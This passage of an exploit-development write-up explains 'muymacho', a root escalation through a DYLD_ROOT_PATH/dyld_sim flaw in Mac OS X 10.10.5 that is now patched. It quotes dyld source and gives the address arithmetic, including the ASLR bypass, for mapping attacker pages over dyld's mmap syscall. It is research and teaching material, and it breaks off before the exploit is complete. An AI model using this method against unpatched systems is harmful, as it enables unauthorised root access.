muymacho is an exploit for a dyld bug present in Mac OS X 10.10.5 allowing local privilege escalation to root. It has been patched in El Capitan (10.11).

It was a fun bug and exploit to develop. This post is written as a guide through the process. You can follow along while viewing the dyld source. I hope you enjoy muymacho.

This post covers the various stages of developing the exploit from discovery, past potential problems, to the completed exploit.


Discovery

The bug was discovered during a source code audit of dyld-353.2.1 (10.10.0 to 10.10.4) and continued in IDA Pro with the binary release of the 10.10.5 update. Apple eventually released source for 10.10.5 on 9/17/2015. The post has been updated to include the newer dyld source code.

The interest in dyld came from a challenge @i0n1c posted on 7/20.

@i0n1c tweet

I found the bug relating to the DYLD_PRINT_TO_FILE environment variable and wrote an exploit. Shortly afterwards, i0n1c released his writeup and an exploit.

While I was hunting for the DYLD_PRINT_TO_FILE vulnerability, I spotted some questionable code. I went back and discovered a vulnerability related to DYLD_ROOT_PATH. I’m certainly not the first or only person to discover this vulnerability.

@i0n1c tweet

@beist tweet

Note: I think that this vulnerability may have been assigned CVE-2015-5876 (credited to beist of grayhash). See the CVE number section in the appendix for more details.

The DYLD_ROOT_PATH vulnerability is the subject of this post and is detailed in the following sections. It has been patched in El Capitan.

dyld is the dynamic linker for Mac OS X and iOS. It works in conjunction with the system loader to prepare a process for execution. The basic steps are:

  • The system loader maps both the binary’s pages and dyld into memory.
  • Control is then handed over to dyld, so it can load and link other libraries and their dependencies into the process address space.
  • The process loading is complete and execution begins at the executable’s entry point in memory.

During the execution of a suid binary, dyld is running with elevated privileges. The binary has not actually begun executing and thus cannot yet lower privileges.

For more details, check out these references here and here (dyld is much more complex than summarized in this post).

The vulnerability is related to the use of the DYLD_ROOT_PATH environment variable. The following is an excerpt from the dyld man page:

DYLD_ROOT_PATH

This is a colon separated list of directories. The dynamic linker will prepend each of this directory paths to every image access until a file is found.

While the above statement is true, there is an additional use that appears to be undocumented. To understand it, we need to digress into the iOS simulator. Unlike Android, which uses an emulator (it executes ARM instructions), iOS uses a simulator that runs applications compiled for x86_64. One of the simulator steps replaces the built-in dyld with a special iOS simulator version. The special version is creatively called dyld_sim.

In order to use dyld_sim, the DYLD_ROOT_PATH environment variable is set to a base directory before executing a program.

$ DYLD_ROOT_PATH=/Users/user/tmp crontab

The example above expects dyld_sim to be located off of the base directory at the following location:

/Users/user/tmp/usr/lib/dyld_sim
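As a minimal sketch, the lookup path can be derived from the base directory by appending the fixed suffix, mirroring the strlcat() call in dyld's _main(). The helper name dyld_sim_path is hypothetical and only illustrates the string handling.

```python
DYLD_SIM_SUFFIX = "/usr/lib/dyld_sim"  # fixed suffix appended by dyld


def dyld_sim_path(root_path):
    """Return where dyld_sim is expected under root_path (hypothetical helper)."""
    # dyld concatenates the two strings directly; the trailing slash is
    # stripped here only to keep the printed path tidy.
    return root_path.rstrip("/") + DYLD_SIM_SUFFIX


print(dyld_sim_path("/Users/user/tmp"))
```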

The details of the vulnerability are in the next section. However, spoiler alert, insufficient validation of the dyld_sim file is to blame. dyld_sim is a Mach-O file, but the exploit produces a dyld_sim that is just muymacho :)

Vulnerability

The majority of this analysis references dyld.cpp from dyld-353.2.3 (10.10.5), with the exception of the 10.10.4 section in the appendix. The bug appears to have been introduced in dyld-239.3 which coincides with the release of OS X 10.9.

The vulnerability is located in the dyld.cpp:useSimulatorDyld() function. If a dyld_sim file exists in the directory specified in the DYLD_ROOT_PATH variable, it’s opened and the resulting file descriptor is passed to useSimulatorDyld().

The code below shows the call from dyld.cpp:_main().

strlcat(simDyldPath, "/usr/lib/dyld_sim", PATH_MAX);
   int fd = my_open(simDyldPath, O_RDONLY, 0);
   if ( fd != -1 ) {
      result = useSimulatorDyld(fd, mainExecutableMH, simDyldPath, argc, argv, envp, apple, startGlue);
      if ( !result && (*startGlue == 0) )
         halt("problem loading iOS simulator dyld");

The function useSimulatorDyld() is shown below in its entirety. It handles the parsing and loading of dyld_sim. It should be noted that any failures in useSimulatorDyld() cause the process to halt.

__attribute__((noinline))
static uintptr_t useSimulatorDyld(int fd, const macho_header* mainExecutableMH, const char* dyldPath, 
                int argc, const char* argv[], const char* envp[], const char* apple[], uintptr_t* startGlue)
{
  *startGlue = 0;
  
  // verify simulator dyld file is owned by root
  struct stat sb;
  if ( fstat(fd, &sb) == -1 )
    return 0;

  // read first page of dyld file
  uint8_t firstPage[4096];
  if ( pread(fd, firstPage, 4096, 0) != 4096 )
    return 0;
  
  // if fat file, pick matching slice
  uint64_t fileOffset = 0;
  uint64_t fileLength = sb.st_size;
  const fat_header* fileStartAsFat = (fat_header*)firstPage;
  if ( fileStartAsFat->magic == OSSwapBigToHostInt32(FAT_MAGIC) ) {
    if ( !fatFindBest(fileStartAsFat, &fileOffset, &fileLength) ) 
      return 0;
    // re-read buffer from start of mach-o slice in fat file
    if ( pread(fd, firstPage, 4096, fileOffset) != 4096 )
      return 0;
  }
  else if ( !isCompatibleMachO(firstPage, dyldPath) ) {
    return 0;
  }
  
  // calculate total size of dyld segments
  const macho_header* mh = (const macho_header*)firstPage;
  uintptr_t mappingSize = 0;
  uintptr_t preferredLoadAddress = 0;
  const uint32_t cmd_count = mh->ncmds;
  const struct load_command* const cmds = (struct load_command*)(((char*)mh)+sizeof(macho_header));
  const struct load_command* cmd = cmds;
  for (uint32_t i = 0; i < cmd_count; ++i) {
    switch (cmd->cmd) {
      case LC_SEGMENT_COMMAND:
        {
          struct macho_segment_command* seg = (struct macho_segment_command*)cmd;
          mappingSize += seg->vmsize;
          if ( seg->fileoff == 0 )
            preferredLoadAddress = seg->vmaddr;
        }
        break;
    }
    cmd = (const struct load_command*)(((char*)cmd)+cmd->cmdsize);
  }

  // reserve space, then mmap each segment
  vm_address_t loadAddress = 0;
  uintptr_t entry = 0;
  if ( ::vm_allocate(mach_task_self(), &loadAddress, mappingSize, VM_FLAGS_ANYWHERE) != 0 )
    return 0;
  cmd = cmds;
  struct linkedit_data_command* codeSigCmd = NULL;
  for (uint32_t i = 0; i < cmd_count; ++i) {
    switch (cmd->cmd) {
      case LC_SEGMENT_COMMAND:
        {
          struct macho_segment_command* seg = (struct macho_segment_command*)cmd;
          uintptr_t requestedLoadAddress = seg->vmaddr - preferredLoadAddress + loadAddress;
          void* segAddress = ::mmap((void*)requestedLoadAddress, seg->filesize, seg->initprot, MAP_FIXED | MAP_PRIVATE, fd, fileOffset + seg->fileoff);
          //dyld::log("dyld_sim %s mapped at %p\n", seg->segname, segAddress);
          if ( segAddress == (void*)(-1) )
            return 0;
        }
        break;
      case LC_UNIXTHREAD:
        {
        #if __i386__
          const i386_thread_state_t* registers = (i386_thread_state_t*)(((char*)cmd) + 16);
          entry = (registers->__eip + loadAddress - preferredLoadAddress);
        #elif __x86_64__
          const x86_thread_state64_t* registers = (x86_thread_state64_t*)(((char*)cmd) + 16);
          entry = (registers->__rip + loadAddress - preferredLoadAddress);
        #endif
        }
        break;
      case LC_CODE_SIGNATURE:
        codeSigCmd = (struct linkedit_data_command*)cmd;
        break;
    }
    cmd = (const struct load_command*)(((char*)cmd)+cmd->cmdsize);
  }
  
  if ( codeSigCmd == NULL )
    return 0;

  fsignatures_t siginfo;
  siginfo.fs_file_start=fileOffset;             // start of mach-o slice in fat file 
  siginfo.fs_blob_start=(void*)(long)(codeSigCmd->dataoff); // start of code-signature in mach-o file
  siginfo.fs_blob_size=codeSigCmd->datasize;          // size of code-signature
  int result = fcntl(fd, F_ADDFILESIGS_FOR_DYLD_SIM, &siginfo);
  if ( result == -1 ) {
    dyld::log("fcntl(F_ADDFILESIGS_FOR_DYLD_SIM) failed with errno=%d\n", errno);
    return 0;
  }

  close(fd);

  // notify debugger that dyld_sim is loaded
  dyld_image_info info;
  info.imageLoadAddress = (mach_header*)loadAddress;
  info.imageFilePath    = strdup(dyldPath);
  info.imageFileModDate = sb.st_mtime;
  addImagesToAllImages(1, &info);
  dyld::gProcessInfo->notification(dyld_image_adding, 1, &info);
  
  // jump into new simulator dyld
  typedef uintptr_t (*sim_entry_proc_t)(int argc, const char* argv[], const char* envp[], const char* apple[],
                const macho_header* mainExecutableMH, const macho_header* dyldMH, uintptr_t dyldSlide,
                const dyld::SyscallHelpers* vtable, uintptr_t* startGlue);
  sim_entry_proc_t newDyld = (sim_entry_proc_t)entry;
  return (*newDyld)(argc, argv, envp, apple, mainExecutableMH, (macho_header*)loadAddress, 
           loadAddress - preferredLoadAddress, 
           &sSysCalls, startGlue);
}

The purpose of useSimulatorDyld() is to load dyld_sim, perform some validation, and then hand control over to it. dyld_sim begins execution and the original dyld will be no more.

As can be seen in the source above, useSimulatorDyld() does the following:

  1. Reads in Mach-O headers
  2. Loops through LC_SEGMENT_64 commands and determines total size
  3. vm_allocate() memory
  4. mmap() segments into memory
  5. Verifies the code signature
  6. Jumps into the dyld_sim entry point

muymacho exploits a DYLD_ROOT_PATH vulnerability present since 10.9. An additional attack vector was present in versions up to 10.10.4 and was patched in the 10.10.5 update.

The astute reader will notice that the vulnerability is in the processing of dyld_sim’s Mach-O headers. A malformed Mach-O file allows memory segments to be replaced leading to arbitrary execution of code, which happens prior to signature verification.

In order to understand how the remapping is possible, we need a little review of Mach-O. Apple provides a full Mach-O reference document. However, the two relevant structures are shown below, with the most important one being segment_command_64.

/*
 * The 64-bit mach header appears at the very beginning of object files for
 * 64-bit architectures.
 */
struct mach_header_64 {
   uint32_t      magic;      /* mach magic number identifier */
   cpu_type_t    cputype;    /* cpu specifier */
   cpu_subtype_t cpusubtype; /* machine specifier */
   uint32_t      filetype;   /* type of file */
   uint32_t      ncmds;      /* number of load commands */
   uint32_t      sizeofcmds; /* the size of all the load commands */
   uint32_t      flags;      /* flags */
   uint32_t      reserved;   /* reserved */
};

/*
 * The 64-bit segment load command indicates that a part of this file is to be
 * mapped into a 64-bit task's address space.  If the 64-bit segment has
 * sections then section_64 structures directly follow the 64-bit segment
 * command and their size is reflected in cmdsize.
 */
struct segment_command_64 { /* for 64-bit architectures */
   uint32_t   cmd;          /* LC_SEGMENT_64 */
   uint32_t   cmdsize;      /* includes sizeof section_64 structs */
   char       segname[16];  /* segment name */
   uint64_t   vmaddr;       /* memory address of this segment */
   uint64_t   vmsize;       /* memory size of this segment */
   uint64_t   fileoff;      /* file offset of this segment */
   uint64_t   filesize;     /* amount to map from the file */
   vm_prot_t  maxprot;      /* maximum VM protection */
   vm_prot_t  initprot;     /* initial VM protection */
   uint32_t   nsects;       /* number of sections in segment */
   uint32_t   flags;        /* flags */
};
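The sizes of these two structures matter later, when counting how many segment commands fit in the single page that dyld reads. A small sketch using Python's struct module can confirm them. The format strings are my own transcription of the fields above (little-endian, no padding), not something taken from muymacho.

```python
import struct

# Field-by-field transcription of the two structures (little-endian, packed).
MACH_HEADER_64 = "<IiiIIIII"           # magic, cputype, cpusubtype, filetype,
                                       # ncmds, sizeofcmds, flags, reserved
SEGMENT_COMMAND_64 = "<II16sQQQQiiII"  # cmd, cmdsize, segname, vmaddr, vmsize,
                                       # fileoff, filesize, maxprot, initprot,
                                       # nsects, flags

header_size = struct.calcsize(MACH_HEADER_64)
segment_size = struct.calcsize(SEGMENT_COMMAND_64)
print(hex(header_size), hex(segment_size))
```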

First useSimulatorDyld() needs to extract the Mach-O header. As can be seen in the source, there is some initial code to determine where the actual header is located in the case of a universal binary. dyld then reads in a page (0x1000 bytes) of data containing the Mach-O header.

After retrieving the header, useSimulatorDyld() processes the load commands. This is accomplished in two loops that cycle through load commands such as LC_SEGMENT_64, LC_UNIXTHREAD, and LC_CODE_SIGNATURE.

The first of the two processing loops is shown below. It looks at LC_SEGMENT_64 load commands. It calculates the total vmsize and determines preferredLoadAddress. If no segments have a fileoff of 0, preferredLoadAddress defaults to 0.

for (uint32_t i = 0; i < cmd_count; ++i) {
      switch (cmd->cmd) {
         case LC_SEGMENT_COMMAND: // <-- Note: defined in a macro as LC_SEGMENT_64 
            {
               struct macho_segment_command* seg = (struct macho_segment_command*)cmd;
               mappingSize += seg->vmsize;
               if ( seg->fileoff == 0 )
                  preferredLoadAddress = seg->vmaddr;
            }
            break;
      }
      cmd = (const struct load_command*)(((char*)cmd)+cmd->cmdsize);
   }
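The loop is easy to model outside of dyld. The sketch below is a simplified Python stand-in, not dyld code: Segment is a hypothetical tuple holding only the three fields the loop reads, and the example values are made up for illustration.

```python
from collections import namedtuple

MASK64 = (1 << 64) - 1  # uintptr_t arithmetic wraps at 64 bits

# Hypothetical stand-in for the fields of segment_command_64 read by the loop.
Segment = namedtuple("Segment", "vmaddr vmsize fileoff")


def first_pass(segments):
    """Model of the first loop: returns (mappingSize, preferredLoadAddress)."""
    mapping_size = 0
    preferred_load_address = 0  # stays 0 unless some segment has fileoff == 0
    for seg in segments:
        mapping_size = (mapping_size + seg.vmsize) & MASK64
        if seg.fileoff == 0:
            preferred_load_address = seg.vmaddr
    return mapping_size, preferred_load_address


# A conventional file: the first segment starts at file offset 0.
print(first_pass([Segment(0x7fff5fc00000, 0x37000, 0)]))
# A crafted file: no segment has fileoff == 0, so the default of 0 survives.
print(first_pass([Segment(0x7ffe5fc1d000, 0x1000, 0x1000)]))
```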

vm_allocate() is called with the calculated mappingSize. The address of the allocated memory is stored in loadAddress. If the allocation fails, the useSimulatorDyld() function exits.

if ( ::vm_allocate(mach_task_self(), &loadAddress, mappingSize, VM_FLAGS_ANYWHERE) != 0 )
      return 0;

After allocating memory, the second loop is encountered and the relevant code can be seen below. This loop also parses LC_UNIXTHREAD and LC_CODE_SIGNATURE load commands, but they are not relevant to the vulnerability.

The load command that leads to exploitation is LC_SEGMENT_64.

case LC_SEGMENT_COMMAND: // <- this is defined in a macro as LC_SEGMENT_64
   {
      struct macho_segment_command* seg = (struct macho_segment_command*)cmd;
      uintptr_t requestedLoadAddress = seg->vmaddr - preferredLoadAddress + loadAddress;
      void* segAddress = ::mmap((void*)requestedLoadAddress, seg->filesize, seg->initprot, MAP_FIXED | MAP_PRIVATE, fd, fileOffset + seg->fileoff);
      //dyld::log("dyld_sim %s mapped at %p\n", seg->segname, segAddress);
      if ( segAddress == (void*)(-1) )
         return 0;
   }

Looking at the code, the intended function of the case statement is to map segments into the newly allocated memory. However, there is almost zero validation of the LC_SEGMENT_64 fields. Specifically, the code calculates a requestedLoadAddress based on controllable fields in a Mach-O binary.

uintptr_t requestedLoadAddress = seg->vmaddr - preferredLoadAddress + loadAddress;

preferredLoadAddress defaults to 0, leaving only loadAddress and seg->vmaddr in play. The following is a simplified equation that will be used throughout this post in various forms:

requestedLoadAddress = seg->vmaddr + loadAddress

seg->vmaddr is taken directly from the segment command and added to loadAddress (set by vm_allocate). This results in a partially controlled requestedLoadAddress which is then passed to mmap.
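To make the missing validation concrete, here is a sketch of the kind of bounds check the loop does not perform. The function inside_allocation is hypothetical (it is not the fix Apple shipped), and the example values are illustrative.

```python
MASK64 = (1 << 64) - 1  # uintptr_t arithmetic wraps at 64 bits


def requested_load_address(vmaddr, preferred_load_address, load_address):
    """Same arithmetic as the second loop in useSimulatorDyld()."""
    return (vmaddr - preferred_load_address + load_address) & MASK64


def inside_allocation(vmaddr, filesize, preferred_load_address,
                      load_address, mapping_size):
    """Hypothetical check: does the segment stay inside the vm_allocate() region?"""
    start = requested_load_address(vmaddr, preferred_load_address, load_address)
    end = start + filesize
    return load_address <= start and end <= load_address + mapping_size


# A segment with a small vmaddr lands inside the reserved region...
print(inside_allocation(0x1000, 0x1000, 0, 0x100009000, 0x20000))
# ...while a huge vmaddr pushes the mapping far outside of it.
print(inside_allocation(0x7ffe5fc1d000, 0x1000, 0, 0x100009000, 0x20000))
```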

mmap is using some very interesting flags, in particular MAP_FIXED. The following is an excerpt from the mmap man page:

MAP_FIXED

Do not permit the system to select a different address than the one specified. If the specified address cannot be used, mmap() will fail. If MAP_FIXED is specified, addr must be a multiple of the pagesize. If a MAP_FIXED request is successful, the mapping established by mmap() replaces any previous mappings for the process’ pages in the range from addr to addr + len. Use of this option is discouraged.

The key words are “replaces any previous mapping”. Mappings such as heaps, the stack, and even executable pages can be replaced. An attacker can create a Mach-O file with crafted LC_SEGMENT_64 load commands. This provides not only partial control of requestedLoadAddress, but also full control of page permissions, filesize, and fileoff.

Manual testing within the debugger confirmed successful replacement of executable pages upon the return of the mmap system call.

Exploit

The following is a cheat sheet, providing a quick reference to various definitions and terms:

CHEAT SHEET

loadAddress
address returned by vm_allocate()
vmaddr
segment’s vmaddr value (seg->vmaddr)
mmap_equation
requestedLoadAddress = vmaddr + loadAddress

Given the ability to replace executable pages in memory, exploitation becomes relatively simple. ROP is not necessary since we control the content of the newly mapped executable pages. Our target page for remapping will be the page containing the mmap system call in dyld. If modern OS X did not have ASLR, this would be trivial. We first cover exploitation without ASLR, then cover how to bypass it.

Since dyld is the dynamic linker, it needs to be self-contained. dyld includes all the system calls it uses. The useSimulatorDyld() function calls the ::mmap() function (wrapper) which in turn calls ___mmap().

00007FFF5FC2693E           mov     r12d, ecx
00007FFF5FC26941           mov     r8d, r15d
00007FFF5FC26944           call    ___mmap
00007FFF5FC26949           mov     rbx, rax
00007FFF5FC2694C           lea     rax, ___syscall_logger

The ___mmap() function contains the mmap system call.

00007FFF5FC26DBC ___mmap   proc near               ; CODE XREF: _mmap+31p
00007FFF5FC26DBC           mov     eax, 20000C5h
00007FFF5FC26DC1           mov     r10, rcx
00007FFF5FC26DC4           syscall
00007FFF5FC26DC6           jnb     short locret_7FFF5FC26DD0

When the mmap system call returns, the instruction pointer will be at address 0x7fff5fc26dc6. Passing mmap a requestedLoadAddress of 0x7fff5fc26000 will replace our targeted mmap system call page. With the segment mapped in, the process begins executing our code.
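The target page and the offset at which execution resumes both fall out of the return address by masking with the page size. A short sketch (split_page is a hypothetical helper name):

```python
PAGE_SIZE = 0x1000


def split_page(address):
    """Return (page base, offset within the page) for an address."""
    return address & ~(PAGE_SIZE - 1), address & (PAGE_SIZE - 1)


# Address of the instruction following the syscall in ___mmap.
page, offset = split_page(0x7fff5fc26dc6)
print(hex(page), hex(offset))
```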

As shown previously, the requestedLoadAddress is calculated in the second loop like so:

uintptr_t requestedLoadAddress = seg->vmaddr - preferredLoadAddress + loadAddress;

The simplified mmap_equation (preferredLoadAddress defaults to 0) is:

requestedLoadAddress = seg->vmaddr + loadAddress

If we recall, loadAddress is set by the call to vm_allocate. As shown below, vm_allocate returns an address located after the base program’s pages. For example, crontab generates the following memory map:

==== regions for process 44045  (non-writable and writable regions are interleaved)
REGION TYPE                      START - END             [ VSIZE] PRT/MAX SHRMOD  REGION DETAIL
mapped file            0000000100000000-0000000100005000 [   20K] r-x/rwx SM=COW  /Users/user/tmp/crontab
mapped file            0000000100005000-0000000100006000 [    4K] rw-/rwx SM=COW  /Users/user/tmp/crontab
mapped file            0000000100006000-0000000100009000 [   12K] r--/rwx SM=COW  /Users/user/tmp/crontab
VM_ALLOCATE (reserved) 0000000100009000-0000000100029000 [  128K] rw-/rwx SM=NUL  reserved VM address space (unallocated)
STACK GUARD            00007fff5bc00000-00007fff5f400000 [ 56.0M] ---/rwx SM=NUL  stack guard for thread 0
Stack                  00007fff5f400000-00007fff5fbff000 [ 8188K] rw-/rwx SM=PRV  thread 0
Stack                  00007fff5fbff000-00007fff5fc00000 [    4K] rw-/rwx SM=COW
__TEXT                 00007fff5fc00000-00007fff5fc37000 [  220K] r-x/rwx SM=COW  /usr/lib/dyld
__DATA                 00007fff5fc37000-00007fff5fc3a000 [   12K] rw-/rwx SM=COW  /usr/lib/dyld
__DATA                 00007fff5fc3a000-00007fff5fc70000 [  216K] rw-/rwx SM=PRV  /usr/lib/dyld
__LINKEDIT             00007fff5fc70000-00007fff5fc84000 [   80K] r--/rwx SM=COW  /usr/lib/dyld
shared memory          00007fffffe00000-00007fffffe01000 [    4K] r--/r-- SM=SHM
shared memory          00007fffffeed000-00007fffffeee000 [    4K] r-x/r-x SM=SHM

Given the memory map above, loadAddress is 0x100009000 (VM_ALLOCATE). Solving for seg->vmaddr results in 0x7ffe5fc1d000, which would replace the dyld executable page at 0x7fff5fc26000.

seg->vmaddr = requestedLoadAddress - loadAddress
seg->vmaddr = 0x7fff5fc26000 - 0x100009000
seg->vmaddr = 0x7ffe5fc1d000
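The same subtraction in Python, with a round-trip check that plugging the result back into the simplified mmap_equation lands on the target page. The helper name solve_vmaddr is my own.

```python
def solve_vmaddr(target_page, load_address):
    """Invert requestedLoadAddress = vmaddr + loadAddress for vmaddr."""
    return target_page - load_address


vmaddr = solve_vmaddr(0x7fff5fc26000, 0x100009000)
# Round trip: the crafted vmaddr plus loadAddress must hit the target page.
assert vmaddr + 0x100009000 == 0x7fff5fc26000
print(hex(vmaddr))
```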

We can craft a Mach-O file with a seg->vmaddr value of 0x7ffe5fc1d000 and the exploit would be done.

macho_single

The above memory map and calculations do not include ASLR in order to simplify discussion. The next section delves into bypassing ASLR.

Bypassing ASLR

The following is an updated cheat sheet, providing a quick reference to various definitions and terms:

CHEAT SHEET

loadAddress
address returned by vm_allocate()
vmaddr
segment’s vmaddr value (seg->vmaddr)
dyld_target
dyld page we are targeting (contains the mmap syscall)
mmap_equation
requestedLoadAddress = vmaddr + loadAddress
ASLR slide
random offset applied to memory regions
0x0000000 to 0xffff000 bytes (0 to 0xffff pages)

The previous section ignores ASLR, which must be considered. ASLR adds slides to various memory regions including executable pages, the stack, and the dyld executable pages. This mitigates attacks because resources no longer live at fixed, predictable addresses.

The following is an example of a memory layout with ASLR. Notice that dyld is not loaded at its preferred address, unlike in the previous vmmap output; its __TEXT segment is slid by 0x9f09000 bytes (from 0x7fff5fc00000 to 0x7fff69b09000).

==== regions for process 44357  (non-writable and writable regions are interleaved)
REGION TYPE                      START - END             [ VSIZE] PRT/MAX SHRMOD  REGION DETAIL
mapped file            0000000102da7000-0000000102dac000 [   20K] r-x/rwx SM=COW  /usr/bin/crontab
mapped file            0000000102dac000-0000000102dad000 [    4K] rw-/rwx SM=COW  /usr/bin/crontab
mapped file            0000000102dad000-0000000102db0000 [   12K] r--/rwx SM=COW  /usr/bin/crontab
VM_ALLOCATE (reserved) 0000000102db0000-0000000102dd0000 [  128K] rw-/rwx SM=NUL  reserved VM address space (unallocated)
STACK GUARD            00007fff58e59000-00007fff5c659000 [ 56.0M] ---/rwx SM=NUL  stack guard for thread 0
Stack                  00007fff5c659000-00007fff5ce58000 [ 8188K] rw-/rwx SM=ZER  thread 0
Stack                  00007fff5ce58000-00007fff5ce59000 [    4K] rw-/rwx SM=COW
__TEXT                 00007fff69b09000-00007fff69b40000 [  220K] r-x/rwx SM=COW  /usr/lib/dyld
__DATA                 00007fff69b40000-00007fff69b43000 [   12K] rw-/rwx SM=COW  /usr/lib/dyld
__DATA                 00007fff69b43000-00007fff69b79000 [  216K] rw-/rwx SM=PRV  /usr/lib/dyld
__LINKEDIT             00007fff69b79000-00007fff69b8d000 [   80K] r--/rwx SM=COW  /usr/lib/dyld
shared memory          00007fffffe00000-00007fffffe01000 [    4K] r--/r-- SM=SHM
shared memory          00007fffffeed000-00007fffffeee000 [    4K] r-x/r-x SM=SHM

Other memory regions are slid as well. The base binary, crontab, has a 0x2da7000 byte slide (from 0x100000000 to 0x102da7000). The same slide also applies to loadAddress (the VM_ALLOCATE region).
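The slides can be read straight off the two vmmap listings by subtracting the unslid start addresses from the slid ones. A quick sketch (variable names are mine):

```python
# Start addresses taken from the two vmmap listings (without and with ASLR).
crontab_slide = 0x102da7000 - 0x100000000      # base binary
load_address_slide = 0x102db0000 - 0x100009000  # VM_ALLOCATE region
dyld_slide = 0x7fff69b09000 - 0x7fff5fc00000    # dyld __TEXT

for name, slide in [("crontab", crontab_slide),
                    ("loadAddress", load_address_slide),
                    ("dyld", dyld_slide)]:
    print(f"{name:12s} slide = {slide:#x} ({slide // 0x1000:#x} pages)")
```

The base binary and the vm_allocate() region share one slide, while dyld gets its own, which is why the two are treated as independent ranges in what follows.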

Memory regions and ranges

The exploit section solves for the vmaddr value which, when added to loadAddress, replaces the dyld_target (0x7fff5fc26000) executable page. Our goal is unchanged: we want to map over the dyld_target page with our content. However, we are no longer working with fixed addresses. We are working with ranges of possible addresses.

Before formulating a plan of attack, we need to determine what the actual memory ranges are. Taking ASLR into account, the possible ranges become:

  • loadAddress: 0x100009000 to 0x110008000 (max ASLR slide = 0x0ffff000)
  • dyld_target: 0x7fff5fc26000 to 0x7fff6fc25000 (max ASLR slide = 0x0ffff000)

Next, we calculate vmaddr’s possible range of values. We want mmap to replace the dyld_target page, so dyld_target is substituted for requestedLoadAddress in the mmap_equation:

vmaddr = dyld_target - loadAddress

In order to determine the vmaddr range, we solve for both the minimum vmaddr as well as the maximum vmaddr. The following diagram should help illustrate how the range is calculated:

ASLR range

The left hand side of the diagram shows the minimum possible vmaddr. It uses the lowest possible dyld_target and the highest possible loadAddress.

vmaddr_min = (dyld_target + ASLR_slide_min) - (loadAddress + ASLR_slide_max)
vmaddr_min = (0x7fff5fc26000 + 0x00000000) - (0x100009000 + 0x0ffff000)
vmaddr_min = 0x7fff5fc26000 - 0x110008000
vmaddr_min = 0x7ffe4fc1e000

The right hand side of the diagram shows the maximum possible vmaddr. It uses the highest possible dyld_target and the lowest possible loadAddress.

vmaddr_max = (dyld_target + ASLR_slide_max) - (loadAddress + ASLR_slide_min)
vmaddr_max = (0x7fff5fc26000 + 0x0ffff000) - (0x100009000 + 0x00000000)
vmaddr_max = 0x7fff6fc25000 - 0x100009000
vmaddr_max = 0x7ffe6fc1c000

The vmaddr range is between 0x7ffe4fc1e000 and 0x7ffe6fc1c000. The entire range covers 0x1fffe000 bytes (twice the maximum ASLR slide).
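The two extremes and the size of the range can be re-derived in a few lines. This is only a check of the arithmetic above, using the unslid addresses from the crontab example.

```python
DYLD_TARGET = 0x7fff5fc26000     # unslid page containing the mmap syscall
LOAD_ADDRESS = 0x100009000       # unslid vm_allocate() result for crontab
ASLR_SLIDE_MAX = 0x0ffff000

# Lowest target combined with highest loadAddress, and vice versa.
vmaddr_min = DYLD_TARGET - (LOAD_ADDRESS + ASLR_SLIDE_MAX)
vmaddr_max = (DYLD_TARGET + ASLR_SLIDE_MAX) - LOAD_ADDRESS
span = vmaddr_max - vmaddr_min

print(hex(vmaddr_min), hex(vmaddr_max), hex(span))
```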

In order to reliably exploit the vulnerability, the complete range of memory may need to be mapped in. It’s impractical to cover the entire range with a single segment (nobody wants a 500+ MB exploit!), so we’ll use multiple segments.

Potential problems

At this point, we have to answer a few more questions:

  • How many segments should be used?
  • Can mmap fail?
  • Can unwanted memory corruption occur?

How many segments should be used?

Only one page (0x1000 bytes) of the Mach-O header is read in. Given that the mach_header_64 structure is 0x20 bytes and the segment_command_64 structure is 72 (0x48) bytes, there can be a maximum of 56 segments. In order to simplify calculations, muymacho uses 32 segments. All the segments’ fileoff fields will point to the same data (0x1000000 bytes).

segments

The 32 segments will cover the entire vmaddr range (0x1fffe000) with a page to spare.
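A quick sanity check of both numbers: how many segment commands fit in the page, and how much slack 32 segments leave. The constant names are mine; the values come from the text.

```python
PAGE = 0x1000
HEADER_SIZE = 0x20           # sizeof(mach_header_64)
SEGMENT_CMD_SIZE = 72        # sizeof(segment_command_64)
SEGMENT_BYTES = 0x1000000    # bytes mapped by each segment
SEGMENT_COUNT = 32
VMADDR_SPAN = 0x1fffe000     # vmaddr_max - vmaddr_min

# Segment commands that fit in the single page read by dyld.
max_segments = (PAGE - HEADER_SIZE) // SEGMENT_CMD_SIZE

# Both ends of the vmaddr range are candidate pages, hence the +1.
pages_needed = VMADDR_SPAN // PAGE + 1
pages_covered = SEGMENT_COUNT * SEGMENT_BYTES // PAGE

print(max_segments, pages_covered - pages_needed)
```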

segment_range

TLDR: 32 segments

Can mmap fail?

The portion of useSimulatorDyld()’s code that calls mmap is shown again below. Note that the useSimulatorDyld() function exits if the mmap call fails.

void* segAddress = ::mmap((void*)requestedLoadAddress, seg->filesize, seg->initprot, MAP_FIXED | MAP_PRIVATE, fd, fileOffset + seg->fileoff);
   //dyld::log("dyld_sim %s mapped at %p\n", seg->segname, segAddress);
   if ( segAddress == (void*)(-1) )
      return 0;

mmap will fail if it attempts to map memory outside of user space (greater than 0x7fffffffffff). We need to ensure that the following is true:

requestedLoadAddress + seg->filesize < 0x7fffffffffff

Due to ASLR, we don’t know the actual loadAddress and dyld_target addresses. We calculated the minimum (0x7ffe4fc1e000) and maximum (0x7ffe6fc1c000) vmaddr which define the range of offsets we must cover in order to negate ASLR.

To calculate the maximum possible requestedLoadAddress, we use the mmap_equation and plug in the maximum possible vmaddr and the maximum possible loadAddress.

requestedLoadAddress = vmaddr + loadAddress
requestedLoadAddress = 0x7ffe6fc1c000 + (loadAddress + 0x0ffff000)
requestedLoadAddress = 0x7ffe6fc1c000 + (0x100009000 + 0x0ffff000)
requestedLoadAddress = 0x7ffe6fc1c000 + 0x110008000 
requestedLoadAddress = 0x7fff7fc24000

A requestedLoadAddress of 0x7fff7fc24000 is well within user space bounds. seg->filesize would need to be greater than 0x803dbfff for the mmap call to fail.
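The headroom can be checked numerically. The sketch below recomputes the worst case and compares it against the 0x1000000 byte segments that muymacho maps.

```python
USER_SPACE_MAX = 0x7fffffffffff
VMADDR_MAX = 0x7ffe6fc1c000
LOAD_ADDRESS_MAX = 0x100009000 + 0x0ffff000  # highest possible loadAddress
SEGMENT_BYTES = 0x1000000                    # filesize of each segment

worst_case = VMADDR_MAX + LOAD_ADDRESS_MAX   # highest requestedLoadAddress
headroom = USER_SPACE_MAX - worst_case       # largest filesize that still fits

print(hex(worst_case), hex(headroom), SEGMENT_BYTES < headroom)
```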

TLDR: mmap is fine :)

Can unwanted memory corruption occur?

Mapping in such large segments (0x1000000 bytes each) may cause some concern. It really comes down to:

  1. Are we going to corrupt the stack while trying to replace dyld_target?

  2. What happens if we map over a portion of dyld’s pages?

